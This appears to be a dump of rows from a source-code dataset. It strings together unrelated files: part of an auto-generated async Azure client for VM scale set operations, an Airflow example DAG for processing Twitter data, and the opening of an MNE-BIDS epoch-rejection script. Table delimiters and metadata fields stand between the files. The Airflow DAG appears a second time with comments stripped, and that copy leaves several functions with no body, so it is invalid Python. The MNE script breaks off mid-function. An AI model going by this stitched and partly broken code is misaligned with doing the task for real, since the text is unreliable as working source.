            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_delete_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._delete_initial.metadata['url'],
        )
        request = _convert_request(request)
        # Expand the URL template placeholders against the client's base URL.
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            # Only a 200 reply carries a body worth deserializing.
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            # Caller-provided response hook.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'}
    @distributed_trace_async
    async def begin_delete(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Begin the long-running operation that deletes a virtual machine
        from a VM scale set.

        :param resource_group_name: Name of the resource group.
        :param vm_scale_set_name: Name of the VM scale set.
        :param instance_id: Instance ID of the virtual machine.
        :return: An AsyncLROPoller whose result is an OperationStatusResponse.
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        # Poll interval: per-call override, else the client-wide default.
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # No continuation token, so start the operation now. The lambda
            # keeps the raw pipeline response for the poller to inspect.
            raw_result = await self._delete_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # error_map was consumed by the initial request; drop it before polling.
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal response once the LRO completes.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        # NOTE: unlike the other LROs here, delete uses the default final-state
        # resolution (no 'final-state-via' lro_options).
        if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            # Resume a previously started operation instead of issuing a new one.
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'}
    @distributed_trace_async
    async def get(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> "_models.VirtualMachineScaleSetVM":
        """Get a virtual machine from a VM scale set.

        :param resource_group_name: Name of the resource group.
        :param vm_scale_set_name: Name of the VM scale set.
        :param instance_id: Instance ID of the virtual machine.
        :return: The deserialized VirtualMachineScaleSetVM.
        :raises ~azure.core.exceptions.HttpResponseError: on any non-200 reply.
        """
        cls = kwargs.pop('cls', None)
        # Default ARM error mapping; caller-supplied error_map entries override it.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_get_request(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self.get.metadata['url'],
        )
        request = _convert_request(request)
        # Expand the URL template placeholders against the client's base URL.
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('VirtualMachineScaleSetVM', pipeline_response)
        if cls:
            # Caller-provided response hook.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'}
    @distributed_trace_async
    async def get_instance_view(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> "_models.VirtualMachineScaleSetVMInstanceView":
        """Get the instance view of a virtual machine in a VM scale set.

        :param resource_group_name: Name of the resource group.
        :param vm_scale_set_name: Name of the VM scale set.
        :param instance_id: Instance ID of the virtual machine.
        :return: The deserialized VirtualMachineScaleSetVMInstanceView.
        :raises ~azure.core.exceptions.HttpResponseError: on any non-200 reply.
        """
        cls = kwargs.pop('cls', None)
        # Default ARM error mapping; caller-supplied error_map entries override it.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_get_instance_view_request(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self.get_instance_view.metadata['url'],
        )
        request = _convert_request(request)
        # Expand the URL template placeholders against the client's base URL.
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('VirtualMachineScaleSetVMInstanceView', pipeline_response)
        if cls:
            # Caller-provided response hook.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get_instance_view.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/instanceView'}
    @distributed_trace
    def list(
        self,
        resource_group_name: str,
        virtual_machine_scale_set_name: str,
        filter: Optional[str] = None,
        select: Optional[str] = None,
        expand: Optional[str] = None,
        **kwargs: Any
    ) -> AsyncIterable["_models.VirtualMachineScaleSetVMListResult"]:
        """List the virtual machines in a VM scale set, transparently paging.

        :param resource_group_name: Name of the resource group.
        :param virtual_machine_scale_set_name: Name of the VM scale set.
        :param filter: OData filter expression to apply, if any.
        :param select: List expression describing the properties to return, if any.
        :param expand: Expand expression to apply, if any.
        :return: An iterator-like instance yielding VirtualMachineScaleSetVM items.
        """
        cls = kwargs.pop('cls', None)
        # Default ARM error mapping; caller-supplied error_map entries override it.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # Build the request for the first page (operation URL template) or
            # for a follow-up page (server-provided next_link).
            if not next_link:
                request = build_list_request(
                    resource_group_name=resource_group_name,
                    virtual_machine_scale_set_name=virtual_machine_scale_set_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    select=select,
                    expand=expand,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_request(
                    resource_group_name=resource_group_name,
                    virtual_machine_scale_set_name=virtual_machine_scale_set_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    select=select,
                    expand=expand,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                # next_link is always fetched with a plain GET.
                request.method = "GET"
            return request
        async def extract_data(pipeline_response):
            # Pull the page's items plus the link to the following page (if any).
            deserialized = self._deserialize("VirtualMachineScaleSetVMListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            # Fetch one page, mapping HTTP errors to typed exceptions.
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines'}
    async def _power_off_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        """Send the initial power-off request for a single scale set VM.

        Returns the deserialized OperationStatusResponse on HTTP 200, or
        ``None`` on HTTP 202 (request accepted; operation still running).
        """
        cls = kwargs.pop('cls', None)
        # Default ARM error mapping; caller-supplied error_map entries override it.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_power_off_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._power_off_initial.metadata['url'],
        )
        request = _convert_request(request)
        # Expand the URL template placeholders against the client's base URL.
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            # Only a 200 reply carries a body worth deserializing.
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            # Caller-provided response hook.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _power_off_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'}
    @distributed_trace_async
    async def begin_power_off(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Begin the long-running operation that powers off a virtual machine
        in a VM scale set.

        :param resource_group_name: Name of the resource group.
        :param vm_scale_set_name: Name of the VM scale set.
        :param instance_id: Instance ID of the virtual machine.
        :return: An AsyncLROPoller whose result is an OperationStatusResponse.
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        # Poll interval: per-call override, else the client-wide default.
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # No continuation token, so start the operation now. The lambda
            # keeps the raw pipeline response for the poller to inspect.
            raw_result = await self._power_off_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # error_map was consumed by the initial request; drop it before polling.
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal response once the LRO completes.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            # Resume a previously started operation instead of issuing a new one.
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_power_off.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/poweroff'}
    async def _restart_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        """Send the initial restart request for a single scale set VM.

        Returns the deserialized OperationStatusResponse on HTTP 200, or
        ``None`` on HTTP 202 (request accepted; operation still running).
        """
        cls = kwargs.pop('cls', None)
        # Default ARM error mapping; caller-supplied error_map entries override it.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_restart_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._restart_initial.metadata['url'],
        )
        request = _convert_request(request)
        # Expand the URL template placeholders against the client's base URL.
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            # Only a 200 reply carries a body worth deserializing.
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            # Caller-provided response hook.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _restart_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'}
    @distributed_trace_async
    async def begin_restart(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Begin the long-running operation that restarts a virtual machine
        in a VM scale set.

        :param resource_group_name: Name of the resource group.
        :param vm_scale_set_name: Name of the VM scale set.
        :param instance_id: Instance ID of the virtual machine.
        :return: An AsyncLROPoller whose result is an OperationStatusResponse.
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        # Poll interval: per-call override, else the client-wide default.
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # No continuation token, so start the operation now. The lambda
            # keeps the raw pipeline response for the poller to inspect.
            raw_result = await self._restart_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # error_map was consumed by the initial request; drop it before polling.
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal response once the LRO completes.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            # Resume a previously started operation instead of issuing a new one.
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_restart.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/restart'}
    async def _start_initial(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> Optional["_models.OperationStatusResponse"]:
        """Send the initial start request for a single scale set VM.

        Returns the deserialized OperationStatusResponse on HTTP 200, or
        ``None`` on HTTP 202 (request accepted; operation still running).
        """
        cls = kwargs.pop('cls', None)
        # Default ARM error mapping; caller-supplied error_map entries override it.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_start_request_initial(
            resource_group_name=resource_group_name,
            vm_scale_set_name=vm_scale_set_name,
            instance_id=instance_id,
            subscription_id=self._config.subscription_id,
            template_url=self._start_initial.metadata['url'],
        )
        request = _convert_request(request)
        # Expand the URL template placeholders against the client's base URL.
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = None
        if response.status_code == 200:
            # Only a 200 reply carries a body worth deserializing.
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
        if cls:
            # Caller-provided response hook.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _start_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'}
    @distributed_trace_async
    async def begin_start(
        self,
        resource_group_name: str,
        vm_scale_set_name: str,
        instance_id: str,
        **kwargs: Any
    ) -> AsyncLROPoller["_models.OperationStatusResponse"]:
        """Begin the long-running operation that starts a virtual machine
        in a VM scale set.

        :param resource_group_name: Name of the resource group.
        :param vm_scale_set_name: Name of the VM scale set.
        :param instance_id: Instance ID of the virtual machine.
        :return: An AsyncLROPoller whose result is an OperationStatusResponse.
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        # Poll interval: per-call override, else the client-wide default.
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # No continuation token, so start the operation now. The lambda
            # keeps the raw pipeline response for the poller to inspect.
            raw_result = await self._start_initial(
                resource_group_name=resource_group_name,
                vm_scale_set_name=vm_scale_set_name,
                instance_id=instance_id,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # error_map was consumed by the initial request; drop it before polling.
        kwargs.pop('error_map', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal response once the LRO completes.
            response = pipeline_response.http_response
            deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            # Resume a previously started operation instead of issuing a new one.
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/start'}
| true
| true
|
f7050d4c1a884b3f7c432e8139d4cdcd936b354a
| 7,730
|
py
|
Python
|
airflow/contrib/example_dags/example_twitter_dag.py
|
suensummit/airflow
|
37a342d0e96a91ce2d34085e225a4e86f54c4e21
|
[
"Apache-2.0"
] | 1
|
2021-11-04T20:11:58.000Z
|
2021-11-04T20:11:58.000Z
|
airflow/contrib/example_dags/example_twitter_dag.py
|
suensummit/airflow
|
37a342d0e96a91ce2d34085e225a4e86f54c4e21
|
[
"Apache-2.0"
] | 20
|
2017-04-18T19:47:46.000Z
|
2020-01-13T04:19:24.000Z
|
airflow/contrib/example_dags/example_twitter_dag.py
|
suensummit/airflow
|
37a342d0e96a91ce2d34085e225a4e86f54c4e21
|
[
"Apache-2.0"
] | 2
|
2018-09-15T07:13:01.000Z
|
2021-03-26T07:27:38.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# --------------------------------------------------------------------------------
# Written By: Ekhtiar Syed
# Last Update: 8th April 2016
# Caveat: This Dag will not run because of missing scripts.
# The purpose of this is to give you a sample of a real world example DAG!
# --------------------------------------------------------------------------------
# --------------------------------------------------------------------------------
# Load The Dependencies
# --------------------------------------------------------------------------------
"""
This is an example dag for managing twitter data.
"""
from datetime import date, timedelta
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.hive_operator import HiveOperator
from airflow.operators.python_operator import PythonOperator
# --------------------------------------------------------------------------------
# Placeholder callables. In a real deployment each of these would live in its
# own module and be imported here with absolute or relative imports.
# --------------------------------------------------------------------------------
def fetchtweets():
    """
    This is a placeholder for fetchtweets.
    """


def cleantweets():
    """
    This is a placeholder for cleantweets.
    """


def analyzetweets():
    """
    This is a placeholder for analyzetweets.
    """


def transfertodb():
    """
    This is a placeholder for transfertodb.
    """


# --------------------------------------------------------------------------------
# Default task arguments shared by every operator in this DAG.
# --------------------------------------------------------------------------------
default_args = {
    'owner': 'Ekhtiar',
    'depends_on_past': False,
    'start_date': airflow.utils.dates.days_ago(5),
    'email': ['airflow@example.com'],
    'email_on_failure': False,
    'email_on_retry': False,
    'retries': 1,
    'retry_delay': timedelta(minutes=5),
}

with DAG(
    dag_id='example_twitter_dag',
    default_args=default_args,
    schedule_interval="@daily"
) as dag:

    # Call the Twitter API and retrieve yesterday's tweets for the four users
    # (Twitter_A,..,Twitter_D). Eight csv files are expected, named
    # direction(from or to)_twitterHandle_date.csv.
    fetch_tweets = PythonOperator(
        task_id='fetch_tweets',
        python_callable=fetchtweets
    )

    # Clean the eight files: drop or cherry-pick columns and parts of the text.
    clean_tweets = PythonOperator(
        task_id='clean_tweets',
        python_callable=cleantweets
    )

    # Analyze the cleaned tweets — e.g. bag-of-words sentiment analysis, or an
    # external web service.
    analyze_tweets = PythonOperator(
        task_id='analyze_tweets',
        python_callable=analyzetweets
    )

    # Final step: summarize the Hive data into MySQL. Declared up front so the
    # per-channel load tasks created below can attach to it.
    hive_to_mysql = PythonOperator(
        task_id='hive_to_mysql',
        python_callable=transfertodb
    )

    fetch_tweets >> clean_tweets >> analyze_tweets

    # The per-channel tasks are generated in two loops: one for outgoing and
    # one for incoming tweets, since in practice each direction usually gets
    # its own analysis.
    from_channels = ['fromTwitter_A', 'fromTwitter_B', 'fromTwitter_C', 'fromTwitter_D']
    to_channels = ['toTwitter_A', 'toTwitter_B', 'toTwitter_C', 'toTwitter_D']
    yesterday = date.today() - timedelta(days=1)
    dt = yesterday.strftime("%Y-%m-%d")
    # Local directory holding the csv files produced upstream.
    local_dir = "/tmp/"
    # HDFS destination (the leading space doubles as the argument separator in
    # the bash command below — kept verbatim).
    hdfs_dir = " /tmp/"

    for channel in to_channels:
        file_name = f"to_{channel}_{dt}.csv"
        load_to_hdfs = BashOperator(
            task_id=f"put_{channel}_to_hdfs",
            bash_command=f"HADOOP_USER_NAME=hdfs hadoop fs -put -f "
                         f"{local_dir}{file_name}{hdfs_dir}{channel}/"
        )
        load_to_hive = HiveOperator(
            task_id=f"load_{channel}_to_hive",
            hql=f"LOAD DATA INPATH '{hdfs_dir}{channel}/{file_name}' "
                f"INTO TABLE {channel} "
                f"PARTITION(dt='{dt}')"
        )
        analyze_tweets >> load_to_hdfs >> load_to_hive >> hive_to_mysql

    for channel in from_channels:
        file_name = f"from_{channel}_{dt}.csv"
        load_to_hdfs = BashOperator(
            task_id=f"put_{channel}_to_hdfs",
            bash_command=f"HADOOP_USER_NAME=hdfs hadoop fs -put -f "
                         f"{local_dir}{file_name}{hdfs_dir}{channel}/"
        )
        load_to_hive = HiveOperator(
            task_id=f"load_{channel}_to_hive",
            hql=f"LOAD DATA INPATH '{hdfs_dir}{channel}/{file_name}' "
                f"INTO TABLE {channel} "
                f"PARTITION(dt='{dt}')"
        )
        analyze_tweets >> load_to_hdfs >> load_to_hive >> hive_to_mysql
| 37.892157
| 91
| 0.527167
|
from datetime import date, timedelta
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.hive_operator import HiveOperator
from airflow.operators.python_operator import PythonOperator
def fetchtweets():
def cleantweets():
def analyzetweets():
def transfertodb():
default_args = {
'owner': 'Ekhtiar',
'depends_on_past': False,
'start_date': airflow.utils.dates.days_ago(5),
'email': ['airflow@example.com'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=5),
}
with DAG(
dag_id='example_twitter_dag',
default_args=default_args,
schedule_interval="@daily"
) as dag:
fetch_tweets = PythonOperator(
task_id='fetch_tweets',
python_callable=fetchtweets
)
clean_tweets = PythonOperator(
task_id='clean_tweets',
python_callable=cleantweets
)
clean_tweets << fetch_tweets
analyze_tweets = PythonOperator(
task_id='analyze_tweets',
python_callable=analyzetweets
)
analyze_tweets << clean_tweets
hive_to_mysql = PythonOperator(
task_id='hive_to_mysql',
python_callable=transfertodb
)
from_channels = ['fromTwitter_A', 'fromTwitter_B', 'fromTwitter_C', 'fromTwitter_D']
to_channels = ['toTwitter_A', 'toTwitter_B', 'toTwitter_C', 'toTwitter_D']
yesterday = date.today() - timedelta(days=1)
dt = yesterday.strftime("%Y-%m-%d")
local_dir = "/tmp/"
hdfs_dir = " /tmp/"
for channel in to_channels:
file_name = "to_" + channel + "_" + yesterday.strftime("%Y-%m-%d") + ".csv"
load_to_hdfs = BashOperator(
task_id="put_" + channel + "_to_hdfs",
bash_command="HADOOP_USER_NAME=hdfs hadoop fs -put -f " +
local_dir + file_name +
hdfs_dir + channel + "/"
)
load_to_hdfs << analyze_tweets
load_to_hive = HiveOperator(
task_id="load_" + channel + "_to_hive",
hql="LOAD DATA INPATH '" +
hdfs_dir + channel + "/" + file_name + "' "
"INTO TABLE " + channel + " "
"PARTITION(dt='" + dt + "')"
)
load_to_hive << load_to_hdfs
load_to_hive >> hive_to_mysql
for channel in from_channels:
file_name = "from_" + channel + "_" + yesterday.strftime("%Y-%m-%d") + ".csv"
load_to_hdfs = BashOperator(
task_id="put_" + channel + "_to_hdfs",
bash_command="HADOOP_USER_NAME=hdfs hadoop fs -put -f " +
local_dir + file_name +
hdfs_dir + channel + "/"
)
load_to_hdfs << analyze_tweets
load_to_hive = HiveOperator(
task_id="load_" + channel + "_to_hive",
hql="LOAD DATA INPATH '" +
hdfs_dir + channel + "/" + file_name + "' "
"INTO TABLE " + channel + " "
"PARTITION(dt='" + dt + "')"
)
load_to_hive << load_to_hdfs
load_to_hive >> hive_to_mysql
| true
| true
|
f7050dd5698de7872ec97699e5e318cacda83a76
| 4,510
|
py
|
Python
|
scripts/preprocessing/06-ptp_reject.py
|
crsegerie/mne-bids-pipeline
|
897d36eb9e7f626215ad6ac4f645ac18f9477c80
|
[
"BSD-3-Clause"
] | 31
|
2019-01-30T11:33:23.000Z
|
2021-02-19T19:30:50.000Z
|
scripts/preprocessing/06-ptp_reject.py
|
crsegerie/mne-bids-pipeline
|
897d36eb9e7f626215ad6ac4f645ac18f9477c80
|
[
"BSD-3-Clause"
] | 207
|
2019-01-29T16:31:26.000Z
|
2021-03-26T13:28:26.000Z
|
scripts/preprocessing/06-ptp_reject.py
|
crsegerie/mne-bids-pipeline
|
897d36eb9e7f626215ad6ac4f645ac18f9477c80
|
[
"BSD-3-Clause"
] | 26
|
2019-01-29T18:05:11.000Z
|
2021-03-17T08:46:52.000Z
|
"""
========================================================
06. Remove epochs based on peak-to-peak (PTP) amplitudes
========================================================
Epochs containing peak-to-peak above the thresholds defined
in the 'reject' parameter are removed from the data.
This step will drop epochs containing non-biological artifacts
but also epochs containing biological artifacts not sufficiently
corrected by the ICA or the SSP processing.
"""
import itertools
import logging
from typing import Optional
import mne
from mne.utils import BunchConst
from mne.parallel import parallel_func
from mne_bids import BIDSPath
import config
from config import gen_log_kwargs, on_error, failsafe_run
logger = logging.getLogger('mne-bids-pipeline')
@failsafe_run(on_error=on_error, script_path=__file__)
def drop_ptp(*, cfg, subject, session=None):
    """Drop epochs whose peak-to-peak amplitude exceeds the rejection thresholds.

    Reads the epochs produced by the spatial-filtering step, drops bad epochs
    via PTP thresholds (capped by ``cfg.ica_reject`` when set), applies
    baseline correction, and saves the cleaned epochs with the ``clean``
    processing label.
    """
    bids_path = BIDSPath(subject=subject,
                         session=session,
                         task=cfg.task,
                         acquisition=cfg.acq,
                         run=None,
                         recording=cfg.rec,
                         space=cfg.space,
                         suffix='epo',
                         extension='.fif',
                         datatype=cfg.datatype,
                         root=cfg.deriv_root,
                         check=False)

    infile_processing = cfg.spatial_filter
    fname_in = bids_path.copy().update(processing=infile_processing)
    fname_out = bids_path.copy().update(processing='clean')

    msg = f'Input: {fname_in}, Output: {fname_out}'
    logger.info(**gen_log_kwargs(message=msg, subject=subject,
                                 session=session))

    # Get rejection parameters and drop bad epochs
